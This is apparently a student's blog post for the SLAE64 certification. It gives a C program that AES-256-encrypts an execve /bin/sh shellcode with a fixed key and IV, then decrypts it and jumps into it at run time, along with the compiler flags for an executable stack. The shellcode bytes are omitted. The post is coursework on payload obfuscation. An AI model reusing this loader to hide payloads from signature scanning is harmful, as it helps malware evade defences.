AES-256 Encrypted Shellcode

This is my solution to the seventh exam question of the SLAE64 certification. This exercise was to write a program that decrypts shellcode and executes it. Of course, you would also need to encrypt the shellcode somehow first. Any programming language was acceptable.

Since I had already been writing mainly C shellcode runners for this class, and I really never have an excuse to program in C anymore, I chose to use AES encryption in a C program. As any security professional will tell you, it's best to use a trusted crypto (whoah - does crypto mean something other than bitcoin?!?) library rather than attempting to write your own. I used the OpenSSL library (its low-level AES_* interface) for this exercise.

My full program is here:


#include <stdio.h>
#include <string.h>
#include <openssl/aes.h>

//encryption utility function declarations
void print_data(const char* label, const void* data, int len);

//the "\x.." string literals that followed each backslash are not reproduced in this extract
unsigned char execve_sc[] = \

unsigned char encrypted_execve_sc[] = \

int main(int argc, char *argv[])
{
    //32-byte key = AES-256; a key baked into the binary next to the ciphertext only obfuscates the payload
    const static unsigned char key[] = {0x23,0x32,0x23,0x32,0x23,0x32,0x23,0x32,0x23,0x32,0x23,0x32,0x23,0x32,0x23,0x32,0x23,0x32,0x23,0x32,0x23,0x32,0x23,0x32,0x23,0x32,0x23,0x32,0x23,0x32,0x23,0x32};
    unsigned char iv[AES_BLOCK_SIZE];

    //dumb logic - if any arg is passed, just try encoding and printing execve_sc
    if (argc > 1) {
        unsigned char tmp_encrypted_execve_sc[sizeof(encrypted_execve_sc)];
        AES_KEY enc_key;
        memset(iv, 0x46, AES_BLOCK_SIZE);   //AES_cbc_encrypt advances iv in place, so reset it before every run
        AES_set_encrypt_key(key, 256, &enc_key);
        AES_cbc_encrypt(execve_sc, tmp_encrypted_execve_sc, sizeof(execve_sc), &enc_key, iv, AES_ENCRYPT);
        print_data("encrypted", tmp_encrypted_execve_sc, sizeof(tmp_encrypted_execve_sc));
        return 0;
    }

    //otherwise we just go ahead and decrypt
    unsigned char decrypted_execve_sc[sizeof(encrypted_execve_sc)];
    AES_KEY dec_key;
    memset(iv, 0x46, AES_BLOCK_SIZE);
    AES_set_decrypt_key(key, 256, &dec_key);
    AES_cbc_encrypt(encrypted_execve_sc, decrypted_execve_sc, sizeof(encrypted_execve_sc), &dec_key, iv, AES_DECRYPT);
    print_data("decrypted", decrypted_execve_sc, sizeof(decrypted_execve_sc));

    //decrypted_execve_sc is a stack buffer, so this jump only works if the binary
    //is built with an executable stack (e.g. gcc -fno-stack-protector -z execstack ... -lcrypto)
    int (*ret)() = (int(*)())decrypted_execve_sc;
    ret();

    return 0;
}

//encryption utility function definitions
void print_data(const char* label, const void* data, int len){
    printf("%s : ", label);
    const unsigned char * p = (const unsigned char*) data;
    int i;
    for (i = 0; i < len; ++i)
        printf("\\x%02X", *p++);
    printf("\n");
}


As you can see - I was pretty sloppy and just threw in an option to encrypt the cleartext if you passed any command line argument. I used this originally to print out the encrypted shellcode for execution and just left it as evidence of the process:

[screenshot: the program run with an argument, printing the encrypted shellcode bytes]

Again, the example shellcode used for this problem was the execve program to spawn /bin/sh.

Other than that, I think the code and APIs used are pretty self-explanatory by name. One detail worth noting is that decryption is also done with AES_cbc_encrypt(): the same function serves both directions, and the last argument (AES_ENCRYPT or AES_DECRYPT) together with the key schedule from AES_set_decrypt_key() selects which one, since AES uses the same key either way. Two caveats with this low-level API: it does no padding, so the buffer length should be a whole number of AES_BLOCK_SIZE blocks (sizeof on a string literal also counts the trailing NUL), and it advances the IV in place, which is why the IV is reset with memset() before each call. The AES_* functions are also deprecated as of OpenSSL 3.0 in favour of the EVP interface. Finally, a fixed key and IV compiled into the same binary as the ciphertext only obfuscate the payload: anyone holding the binary can decrypt it, so this defeats static signatures on the shellcode bytes, not analysis.

Running the program prints out the decrypted bytes and gives me a shell once again:

[screenshot: the program run with no arguments, printing the decrypted bytes and dropping into /bin/sh]

All code referenced in this blog post is available at:

This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert Certification.

Certification at:

Student ID: SLAE64 - 1546